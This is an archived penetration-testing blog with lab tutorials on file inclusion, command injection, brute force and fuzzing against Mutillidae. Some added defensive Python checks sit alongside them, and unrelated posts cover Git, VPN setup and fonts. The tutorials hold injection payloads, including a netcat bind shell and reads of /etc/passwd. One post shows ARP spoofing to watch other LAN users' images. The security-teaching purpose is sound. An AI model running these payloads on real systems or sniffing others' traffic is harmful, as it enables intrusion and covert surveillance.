Thursday, October 17, 2013

Local PHP File Inclusion Vulnerability Example | Web Applications Hacking | How To | LFI PHP

Written by Pranshu Bajpai | LinkedIn

The vulnerability lies in how web pages are invoked on a web server. If the page to include is taken from the request and referenced directly (an absolute path or a direct file reference), it becomes possible to invoke files on the server that a hacker has no business seeing.

You can read up on the theory here.

How To Exploit Local PHP File Inclusion Vulnerability on a Web Server | Mutillidae

Attacked Server: 1. Mutillidae  2. Net-force
Vulnerable Page: /mutillidae/index.php?page=
Attack Type: Local PHP File Inclusion


A hacker notices that a GET Parameter 'page' is used to 'include' pages residing on a web server.

We know the web server is running on a Linux system, so we try to invoke the Linux password file by specifying its absolute path:

page=/etc/passwd



If the web server were running on a Windows system, we could test the same thing by trying to invoke:

page=C:\\boot.ini

The contents of the file would be displayed on the screen if Local File Inclusion exists:



Notice the password hash for the user 'NetForce'. This can be cracked with John the Ripper [JTR].

Such attacks can be avoided by not building the include path from the request (no absolute paths or direct file references when referencing web pages on the server), by using an if-else structure that maps the parameter to a fixed set of specific pages only, or by encoding the attacker's request so that a value such as /etc/passwd is never treated as a path.
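The first two mitigations above amount to an allowlist: the 'page' value selects from a fixed set of files instead of naming a path. The following is an added Python model of that check, not the post's or Mutillidae's PHP; the page names, the /var/www/mutillidae web root and the file names are constructed. It also shows why a naive os.path.join is not a fix.

```python
import os

# Constructed allowlist for this example (not Mutillidae's own code): the only values
# of the 'page' parameter the application will honour, mapped to the file to include.
ALLOWED_PAGES = {
    "home": "home.php",
    "login": "login.php",
    "credits": "credits.php",
}

# Hypothetical web root; only files directly inside it may ever be included.
WEB_ROOT = "/var/www/mutillidae"


def resolve_page_naive(page, web_root=WEB_ROOT):
    """The vulnerable pattern: the request value is treated as a path and joined to the
    web root. os.path.join discards web_root when page is absolute, so 'page=/etc/passwd'
    resolves to /etc/passwd itself, which is exactly the behaviour shown in the post."""
    return os.path.join(web_root, page)


def resolve_page(page, allowed=ALLOWED_PAGES, web_root=WEB_ROOT):
    """Return the file to include for a 'page' value, or None if the request must be refused.

    Two independent checks are applied:
    1. The value must be a key of the allowlist (the 'if-else structure' mitigation):
       attacker-controlled text never becomes a filesystem path at all.
    2. After normalisation the chosen file must still sit directly inside the web root,
       so a careless allowlist entry such as '../../etc/passwd' is also refused.
    """
    filename = allowed.get(page)
    if filename is None:
        return None
    # realpath collapses '..' components and symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(web_root, filename))
    if os.path.dirname(candidate) != os.path.realpath(web_root):
        return None
    return candidate
```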

How To Test Cookie / Session ID Randomness Using Burp Suite Sequencer

Written by Pranshu Bajpai | LinkedIn

When you log on to a web server, a session is created and identified by a session ID. The session identifier is usually carried in a cookie: the cookie holds the session ID so that you log in once per session, and from then on the session is presented to each web page you browse on that server. Read up on Session Management.

The session, hence, depends on the session ID. In PHP, the 'PHPSESSID' cookie holds the session ID when you visit a web page on the server.

This ID needs to be random enough to preserve the security of the session. If an attacker is able to predict what the session ID is going to be, he/she can bypass authentication.

Test for Randomness of the Session ID / PHPSESSID / Cookie | Mutillidae

Attacked Server: Mutillidae
Test Page: Main Login Page
Test Parameter: PHPSESSID
Test Type: Session Randomness

1. Load the web page on the server and intercept the request in Burp Proxy. Notice that the server sets the PHPSESSID. Delete it and forward the request to the server.

The server notices the missing PHPSESSID and sets a new ID.

Now delete this one too, right-click the request and choose 'Send to Sequencer'.



2. In the Sequencer, make sure PHPSESSID is highlighted for testing and begin the test with 'Start live capture'.

3. The test will keep grabbing new tokens and then analyze this sample data for randomness.

For accurate results, wait until the sample size is at least 200 tokens.


Then click 'Analyze Now'

Notice the entropy is 121 bits, which is rated 'excellent' (entropy here refers to the randomness of the tokens).

So this test checks the unpredictability of the session ID.
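Burp Sequencer's analysis is more thorough than this, but a crude per-position entropy estimate is enough to see why a counter-based token fails and why the post insists on a sample of 200 tokens. This is an added example, not the post's or Burp's code; the two token generators and the 26-character token length are constructed for illustration.

```python
import math
import secrets
from collections import Counter

MIN_SAMPLE = 200   # the post waits for at least 200 tokens before analysing


def sample_is_sufficient(tokens):
    """True when the sample is large enough and every token has the same length."""
    return len(tokens) >= MIN_SAMPLE and len({len(t) for t in tokens}) == 1


def position_entropy(tokens, pos):
    """Shannon entropy, in bits, of the character seen at index `pos` across the sample."""
    counts = Counter(t[pos] for t in tokens)
    n = len(tokens)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def estimate_token_entropy(tokens):
    """Crude per-position entropy estimate (bits) for a sample of session tokens.

    Each character position is scored separately and the scores are summed, so
    positions are treated as independent and the figure is an upper bound on the
    real entropy. It is still enough to tell a counter-based token from a random one.
    A position can never score more than log2(N) bits from N samples, which is the
    reason for insisting on a decent sample size before drawing conclusions.
    """
    if not sample_is_sufficient(tokens):
        raise ValueError("need %d equal-length tokens, got %d" % (MIN_SAMPLE, len(tokens)))
    return sum(position_entropy(tokens, i) for i in range(len(tokens[0])))


def predictable_tokens(n, start=0x1234567890ab):
    """Constructed 'bad' generator: a counter rendered as 26 hex digits. Only the last
    few positions ever change, so the estimate stays in single-digit bits."""
    return ["%026x" % (start + i) for i in range(n)]


def random_tokens(n):
    """Constructed 'good' generator: 26 hex digits drawn from the OS CSPRNG."""
    return [secrets.token_hex(13) for _ in range(n)]
```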

Fuzz Testing Web Applications With Burp Suite | Burp Intruder [Sniper] to Fuzz Parameters

Written by Pranshu Bajpai | LinkedIn

IronGeek made a lot of good videos about testing web applications with Burp Suite. I tested these attacks out myself.

Attacked Server: Mutillidae
Test Page: Main Login Form
Test Parameter: Username
Test Type: Fuzzing

In simple words, fuzzing means sending "weird" data to the server and observing how it reacts. A more formal explanation can be found here.

Fuzz Testing Login Form Parameters using Burp Suite | Mutillidae



1. Enter any username on the web page, press enter and intercept the request in Burp Proxy. Then send it to "Intruder"

2. Select the "sniper" attack type in Intruder and select the username parameter to be fuzzed [marked by $..$]


3. Now it is time to set the 'Payload', that is, what the "weird" data is going to be. For test purposes, I used a simple list into which I inserted payloads manually. You can use the various fuzz lists available on the Internet.

4. Notice that one of the fuzz payloads is a single quote character (').


5. Click 'Start Attack'. After it finishes, look at the server responses. All HTTP codes are '200 OK', so the length of the returned pages (server response) is what is of interest.

Almost all response page lengths are the same, except the one for the single-quote payload (').

'Render' this page in Burp and you will see that the page is greater in length because it returns additional error lines (a database error, which means SQL injection attacks are possible).

So the fuzz test revealed a possible SQL injection on the login form's 'Username' parameter.

Directory Browsing Vulnerability | Directory Listing / Traversal Attack | How To | Demo [Screenshots] | Mutillidae

Written by Pranshu Bajpai | LinkedIn

As a web application penetration tester, when you find directory browsing enabled on a web server, you include it in your report, but you know exploiting it is a long shot.

The main threat lies in the fact that the attacker can view all the files present in the web directory. This might include PHP files (or files in other web languages). If the attacker is dedicated enough, they will read this PHP code to figure out a way to circumvent security.

Directory Browsing Vulnerability in Mutillidae




An attacker can review the code behind these PHP scripts to find potential weaknesses.




Driftnet Tutorial | How to Sniff Images with Driftnet + Arpspoof / Ettercap | Kali Linux / Backtrack

Written by Pranshu Bajpai | LinkedIn

If you're on a shared LAN and you are curious to know what kind of images people are searching for over the web, you can use Driftnet.

For a penetration tester, there's no direct point in doing this, but since I tested it, I thought I might as well make a post about it. As a network administrator enforcing a policy on what kind of images may be searched for on the local network, this might come in handy to see what images people are viewing at any time.

How to Sniff Images using Driftnet | ARP Spoofing with Arpspoof or Ettercap in Kali Linux

If you are learning, it is better to use Arpspoof to do the spoofing, since it is a manual command-line tool; setting up the man-in-the-middle attack this way will aid your learning.

1. Enable IP forwarding:
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. Use Arpspoof on the desired interface [eth0] to spoof the local switch's MAC to your own for a particular victim IP in the network [see figure below].



Victim machines now think you are the switch, hence all packets destined for the switch arrive on your machine.

3. Use Arpspoof to spoof the victim's MAC to your own for the switch on the network.



Traffic from switch destined to the victim's IP now arrives on your machine.

You are now acting as the "man in the middle".

4. Fire up driftnet. If you've done it all right, you should see the images.




Looks like someone's hunting for a new dress.

Using Ettercap to perform the ARP Spoof


This is a GUI tool, and ARP spoofing with Ettercap is simply a matter of pointing and clicking a few times. There are several tutorials on it on the web, so I am not covering that here; the concept is the same man-in-the-middle attack.
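The man-in-the-middle set-up above leaves a visible footprint on the victim's side: the gateway's MAC address changes and one MAC starts answering for several IP addresses. The following is an added detection example, not part of the original post or of the arpspoof/driftnet tools; the neighbour-table snapshots, addresses and MACs are constructed, and 192.168.1.1 is assumed to be the gateway.

```python
import re

# Lines in the format printed by `ip neigh show` (only the first four fields are used).
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17})")

GATEWAY = "192.168.1.1"     # assumed gateway address for the example network

# Constructed baseline: what the neighbour table looked like before the spoof.
BASELINE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.10 dev eth0 lladdr 00:11:22:33:44:10 STALE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE
"""

# Constructed snapshot while the host at .20 answers ARP for both the gateway and .10,
# which is the two-sided arpspoof set-up the post walks through.
SPOOFED = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE
192.168.1.10 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE
"""


def parse_neigh(text):
    """Return {ip: mac} for every parsable line of `ip neigh show` output."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def arp_alerts(baseline_text, current_text, gateway=GATEWAY):
    """Compare two neighbour-table snapshots and return a list of alert strings.

    Two symptoms of the attack described in the post are checked:
    1. the gateway's MAC address changed since the baseline;
    2. one MAC now claims several IP addresses (the attacker answers for both the
       gateway and the victim so that traffic in both directions passes through it).
    """
    before = parse_neigh(baseline_text)
    now = parse_neigh(current_text)
    alerts = []
    if gateway in before and gateway in now and before[gateway] != now[gateway]:
        alerts.append("gateway %s MAC changed %s -> %s"
                      % (gateway, before[gateway], now[gateway]))
    by_mac = {}
    for ip, mac in now.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append("MAC %s claims %d addresses: %s"
                          % (mac, len(ips), ", ".join(sorted(ips))))
    return alerts
```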


Wednesday, October 9, 2013

'remindme.py' A Simple Python Script To Remind You About Events That You Want To Remember | Pranshu

Written by Pranshu Bajpai | Google+ | LinkedIn

This is a simple Linux utility that I coded long ago for personal use to remind me about events I want to remember. It reminds you of a given event on a certain date, once you log onto your computer on that date.

This is a basic script in Python. Please feel free to improve it to suit your particular needs.

Functionality:

-Displays a Graphical Notification in Top Right Corner Each Time you Login
-You Manually Enter Events and Corresponding dates

How to Use:

Create a folder called "python codes" in the root user's home directory (/root) and place "remindme.py" there.

(Path is hard coded in the script. This is bad coding, but I was in a hurry. Like I said, feel free to improve the code)

Create a File in this folder called "remindme.data"

Enter the Dates and Events in this format and Save:

MonthDay Event
Example for 10th of Oct:
1010 EventName



Add remindme.py to 'Startup'  (Applications -> System Tools -> Preferences -> Startup)



(I have added a module for 'Auto-Add to Startup' but it was giving issues, so I commented it out, feel free to correct that)

Each Time you login now, remindme will check the remindme.data file and see if there's an Event listed for today. If an event is listed, it will display a notification:




If you're new to Python you might like to read the code:

#!/usr/bin/python
# remindme.py: shows a desktop notification for any event listed for today.
# Written against Python 2 (the gtk and pynotify modules are Python 2 bindings).

import time       # for checking the current date
import gtk.gdk    # for the screen size, used to position the notification
import pynotify   # for desktop notifications

today = time.strftime("%m%d")                                  # e.g. "1010" for 10 October
Remind_Me_Path = r"python /root/python\ codes/remindme.py"     # command written to the startup file
DATA_FILE = "/root/python codes/remindme.data"                 # one event per line: "MMDD Event"
STARTUP_FILE = "/root/.bash_profile"


# Checks whether the startup entry has already been made, because we don't
# want a new entry added every time the program runs.
def check_startup_entry():
    with open(STARTUP_FILE, 'r') as startup:
        for line in startup:
            if Remind_Me_Path in line:
                return                  # entry already present, nothing to do
    add_to_startup()


# Adds the startup entry if check_startup_entry() didn't find one.
def add_to_startup():
    with open(STARTUP_FILE, 'a') as startup:
        startup.write(Remind_Me_Path + "\n")


# Checks for today's events in the remindme.data file.
def check_for_event():
    with open(DATA_FILE, 'r') as data:
        for line in data:
            line = line.strip()
            # The date is the first field, so match the start of the line rather than
            # anywhere in it (an event called "Room 1010" must not fire every day).
            if line.startswith(today):
                notify(line)


# Called by check_for_event() to display the notification.
def notify(arg):
    pynotify.init("Basic")
    n = pynotify.Notification("Remind_Me: " + arg)
    n.set_hint('x', gtk.gdk.screen_width() / 2.)
    n.set_hint('y', gtk.gdk.screen_height() / 2.)
    n.show()


# Auto-add to startup is disabled for now (see the note above); uncomment to enable it.
# check_startup_entry()
check_for_event()

Web Applications Authentication Brute Force | Practical Demo [Screenshots] | Brute Force Website Login | How To

Written by Pranshu Bajpai | Google+ | LinkedIn

This post is meant to elucidate web application brute forcing by providing a practical demo.

Read up on Authentication Brute Force here.

OWASP testing guide is your friend in Web Application Hacking.

How To Brute Force Website Login | Web Application Hacking Example | Authentication Brute Force


We have a 'Test' website running on 172.19.17.120. I have created a Test account on it with username 'pranshu' and password 'p'. (As we are playing the part of a penetration tester, during the test we will assume we do not know the password)

It has a login form requiring a 'username' and 'password'. HTTP POST Request Parameters are used.

Set up Burp Suite Proxy to intercept traffic between your browser and the server page you will be trying to brute force [Read up on Burp Suite].



Then send the intercepted request to Burp Suite 'Intruder' to be attacked.

The attack type we will use is 'Cluster Bomb'.

The highlighted parameters in the image above are the ones that will be brute forced.

In case you already know the 'username', "un-highlight" it, meaning only the password will be brute forced. Since I already know the username is 'pranshu', I will set the username to 'pranshu' and brute force the password only.



Payload type is a 'simple list' of characters 'a,b,c,d....z'  [which we will use as possible passwords]

Execute the attack. It will set the username to 'pranshu' and go through the 'simple list', trying every letter of the alphabet as the password. All attempts will receive HTTP code 200 (OK).






Except one, where the payload was set to 'p'. It received HTTP code 302 (Redirect).

If you know HTTP codes, you know that 302 (Redirect) means that the web page is trying to send us to another page. As a penetration tester, I would guess that the redirection is occurring because of a successful login (redirect to the 'Home' page or something similar).

To verify this, I 'render' the 'response' in Burp Suite and sure enough I see I am logged in as user 'pranshu'.

In this case I have used Burp Suite, but you can use 'Brutus' or 'Hydra' for such online brute force password cracking.
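The 200-versus-302 signal the post uses is equally visible in the server's access log, which is where a defender looks for this attack. The following is an added example, not code from the post; the log lines, client addresses and the /login.php path are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed web-server log lines in combined format. They mirror the pattern in the
# post seen from the server side: a burst of POSTs to the login page answered with 200
# (form shown again) followed by a 302 (successful login redirect). 10.0.0.9 is a normal
# user who logged in at the first attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Oct/2013:10:00:01 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:02 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Oct/2013:10:00:03 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:03 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:04 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:05 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:06 +0000] "POST /login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Oct/2013:10:00:07 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client, timestamp, method, path, status code (the remaining fields are not needed here)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse_login_events(log_text, login_path):
    """Return {client_ip: [(timestamp, status), ...]} for POSTs to the login page."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group(3) != "POST" or m.group(4) != login_path:
            continue
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        events[m.group(1)].append((ts, int(m.group(5))))
    return events


def login_bursts(log_text, login_path="/login.php", threshold=5, window_seconds=60):
    """Flag clients that failed the login form `threshold` or more times within the window.

    A 200 on the login POST is treated as a failed attempt (the form is rendered again)
    and a 302 as a successful one, the same signal the post uses to spot the right password.
    For each flagged client the result records the largest burst of failures and whether a
    302 followed the first failure, which is the case that warrants an immediate response.
    """
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, evs in parse_login_events(log_text, login_path).items():
        evs.sort()
        fails = [t for t, s in evs if s == 200]
        best = start = 0
        for end in range(len(fails)):          # sliding window over failure timestamps
            while fails[end] - fails[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            success_after = any(s == 302 and t > fails[0] for t, s in evs)
            alerts[ip] = {"failures": best, "success_after": success_after}
    return alerts
```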

Command Injection Attack Example [Screenshots] | Web Applications Hacking | Using Kali Linux

Written by Pranshu Bajpai | Google+ | LinkedIn

Read up on command injection here.

OWASP testing guide is your best friend while learning web applications hacking or penetration testing.

I tested the attack on two different vulnerable applications, one of which is 'Mutillidae'


Command Injection Attack Example

Ideally, you are supposed to use this web application to look up DNS and resolve hostnames to IP addresses.

However, the code is vulnerable to 'command injection attack'.

As you know, in Bash we can execute two commands one after the other by typing:

#cmd1 && cmd2

Try this in the vulnerable application (the point is to get another command executed on the server)

www.facebook.com && ls /

In the vulnerable application, Facebook's IP address is first resolved on the server and then the second command gets executed, listing the contents of the root directory ('/').



Now that you know the command injection vulnerability exists, you can try different commands and construct an attack.

For example:

Display the contents of 'passwd' file

www.facebook.com && cat /etc/passwd

OR invoke netcat to listen for commands on port 8085 of the victim machine:

www.facebook.com && nc -l -p 8085 -e '/bin/bash'



See what we did here?

I assume the netcat utility is present on the server, so I tell it to listen on port 8085 (and invoke bash).

Now from our Terminal we can use our netcat client to connect to that server

#nc 172.X.X.X 8085

We are connected. We can now begin executing commands on the compromised remote machine.

#whoami



Note that we are a normal user ('www-data') and not root. Hence, we have limited privileges at this point.

However, using privileges of 'www-data' it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.

To deface the website

#vi /var/www/index.html

It is now possible to edit this file and deface the website.

Note that you can terminate the first command simply by typing ';' and hence don't always need the first part, that is, 'www.facebook.com'. For example:

; cat /etc/passwd
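The root cause in the lookup page is that the hostname is pasted into a shell command string. The following added example (not the post's or Mutillidae's code) shows the vulnerable construction beside the fix: validate the input as a hostname and run the lookup with an argument vector and no shell; nslookup is assumed to be the resolver the application calls.

```python
import re
import subprocess

# RFC 1123 style hostname: labels of letters, digits and hyphens joined by dots.
# Constructed for this example; tighten it further if your application needs less.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_valid_hostname(value):
    """True only for a plain hostname; anything containing spaces, '&', ';', '|', '/'
    or other shell metacharacters fails, so the post's payloads never get through."""
    return bool(HOSTNAME_RE.match(value))


def vulnerable_command(hostname):
    """Models the flaw in the post: user input concatenated into a shell command line.
    Returned rather than executed here; given 'host && ls /' a shell would run both."""
    return "nslookup " + hostname


def lookup_argv(hostname):
    """Build the argument vector for a safe lookup.

    Raises ValueError for anything that is not a hostname. The result is meant for
    subprocess.run(argv) with shell=False: even if the validation were loosened,
    '&&' or ';' would reach nslookup as literal text and never be interpreted by a shell.
    """
    if not is_valid_hostname(hostname):
        raise ValueError("invalid hostname: %r" % hostname)
    return ["nslookup", hostname]


def safe_lookup(hostname, timeout=5):
    """Run the lookup without a shell and return nslookup's stdout (needs nslookup installed)."""
    completed = subprocess.run(lookup_argv(hostname), shell=False, capture_output=True,
                               text=True, timeout=timeout)
    return completed.stdout
```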

Quick Github Tutorial For Beginners | Using Git In Linux | Kali Linux, Ubuntu, Debian, Backtrack | How To

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

This is not meant to be an exhaustive tutorial. This does not discuss the concepts of Git that you should know (like working directory, staging area, head). This is a very quick demonstration of how to get started.

Quick Github Tutorial Or How To use Git in Linux


1. Visit Github

2. Make an Account.

3. Create a New Repository (of your current coding project)

4. Initial Git Setup (in your Terminal):

#git config --global user.name "lifeofpentester"
#git config --global user.email "......pranshu@gmail.com"
#git config --global credential.helper cache

If you use a Proxy Server to connect to the Internet:
#git config --global http.proxy http://user:pass@proxyserver:port

After you've configured the git global settings, you can check them:

#git config --list



5. In your Terminal:

Navigate to the folder where your current project files reside and:

#git init
#git add .              #to add all files

OR

#git add huntpass.py    #to add a particular file

OR

#git add '*.py'         #to add all files of a specific type

#git commit -m "Initial Commit"
#git status

Now, we need to 'push' these changes to the remote location:

#git remote add origin https://github.com/lifeofpentester/huntpass.git
#git push -u origin master

Note: You might come across the error that says 'Fatal: remote origin already exists'. In this case, you need to remove that origin first, with the following command:
#git remote rm origin
Fire up your browser, go to https://github.com and log in.

Under your profile, click 'Repos' and visit the repository.

If you have done it all right, this repo will now reflect the "pushed" files.


Monday, October 7, 2013

Index Page '/'

Sunday, October 6, 2013

How to Setup VPN on Android Phone or Tablet | Easy Step by Step Instructions | Screenshots included

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

In my previous posts, I have mentioned:

How to set up VPN connection on Windows

And

How to configure VPN connection in Linux.

In short, reasons for setting up VPN services are: anonymous surfing and downloading, security, privacy and defeating unreasonable censorship. Also Read this.

How to Configure / Setup VPN Connection in Android Device 

1. Go to the 'Google Play Store' on the Android device and download the 'OpenVPN' application.

2. Subscribe to a VPN service. I use AirVPN. (You can also find free VPN servers if you do not wish to pay. However, there may be some bandwidth restrictions with free VPNs)

3. Log in to the VPN service online and locate 'Generate Configuration files'. Choose 'Android Device'.




4. Download the .ovpn and proxyauth files (proxyauth is needed if your local network proxy requires authentication).

5. On the Android device, open 'OpenVPN' --> 'Settings' --> 'Import' --> choose the location of the downloaded .ovpn file and 'Import' it.

6. Make sure your 'WiFi' is turned on and go to 'OpenVPN' --> Connect.


You will now see that openVPN is connected.

Here are a couple of images of downloading torrents while on an OpenVPN connection on an Android device.


Disclaimer: I do not endorse downloading files for free through P2P clients. These images were meant to be educational only.

VPN Configuration / VPN Client in Windows 7 / Windows 8 / Windows xp | How to set up | Anonymous Internet | Creating VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

In my previous post, I have mentioned the reasons for using VPN and how to install or configure it in Linux.

The process becomes even simpler in the case of Windows.

How to set up / configure VPN connection in Windows

1. Subscribe to a VPN service provider. I have subscribed to AirVPN.

2. Locate 'VPN Configuration Generator' and choose 'Windows' as Operating System.



3. Download the .ovpn file and the .proxyauth file (in case your local network proxy uses authentication).


4. Go to the OpenVPN website --> 'Community' and download the 'OpenVPN Client'.

5. Install the OpenVPN client. Then go to Programs --> OpenVPN --> Config

This should open the 'config' folder. Paste the downloaded .ovpn and .proxyauth files there.

6. Run the OpenVPN client. Right-click the icon in the bottom-right corner (system tray), choose a VPN server and 'Connect'.



You should now see a window where OpenVPN configures itself according to the information in the .ovpn file.

After it finishes, you will notice a new connection with a new IP (Notice a private IP address).


In the 'cmd' terminal, type 'ipconfig' and you should now see the new connection and its IP.


Remove any local proxy settings from the browser and connect to the Internet. You should now be connected through a VPN tunnel.



VPN Configuration / VPN Client in Kali Linux / Debian / Ubuntu / Backtrack | How to | Anonymous Internet | VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

As a penetration tester, I have a variety of concerns while using the Internet:

1. Security: While I work as a penetration tester for remote clients, I like to make sure my "tunnel" to the internet is free from eavesdroppers and is reasonably secure. VPN tunneling takes care of that.

2. Anonymity: All of us need  privacy and anonymity for one reason or another. VPN servers allow that by 'not storing' logs of usage on their servers.

3. Over-blocking and "Internet-usage Policies": ISPs and local network administrators can get overzealous about restricting user activity on their networks (this is especially so for college and office networks). The network that I use takes pride in blocking categories like "file transfer" and "hacking". On several occasions, I have a legitimate need for visiting a hack forum or a "file transfer" service, since most email providers don't allow 'attachments' to go over 25 - 30 MB.

(By the way, you can also use TOR for anonymity and unblocking websites. I have written about how to use TOR in Kali Linux here)

How to set up / configure VPN in Linux:

Step 1. Subscribe to a VPN Service. I have subscribed to AirVPN (around $9 a month)

Step 2. Login to the VPN service provider's website (AirVPN in my case) and locate 'Generate Configuration file'




Step 3. Download the .ovpn file

Additionally, a .proxyauth file will be provided if proxy authentication is required by your local network proxy (see HTTP code 407).

Step 4. In Terminal type:

#apt-get install openvpn
#openvpn --version
#openvpn --config <file_you_downloaded.ovpn>


This should bring up the VPN connection.

#ifconfig



Notice the presence of a new interface 'tun0', along with its IP address (a private IP address provided by the VPN network).

Now remove any local proxy setting you might be using in your browsers or system and connect to the Internet through the VPN tunnel.



How to Install New Cool / Hacker Fonts in Kali Linux / BackTrack / Debian

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

Are you looking to install new cool "HaX0r" fonts on your Linux distro?

My Advice: Don't

Reason: Most of the "hacker" fonts out there are illegible and not suitable for the long hours that you might be spending typing on Terminals as a penetration tester.

Here's how to install a new font in Linux:


Step 1: Download a .ttf font from the Internet. Google it, you will find many. As I have stressed before, avoid "cool hacker" fonts. Look for something comfortable to read.

Step 2.

#gnome-font-viewer <font_location_on_drive>


(Notice the illegibility of the font)

Step 3. Install font




That's it. The new font will now show up in your 'Set Font' option in Terminal 'Preferences' or wherever you need to use it.

Given below are a couple of images of fonts that were too "Kewl" or "Elite" for me to use. I uninstalled them immediately.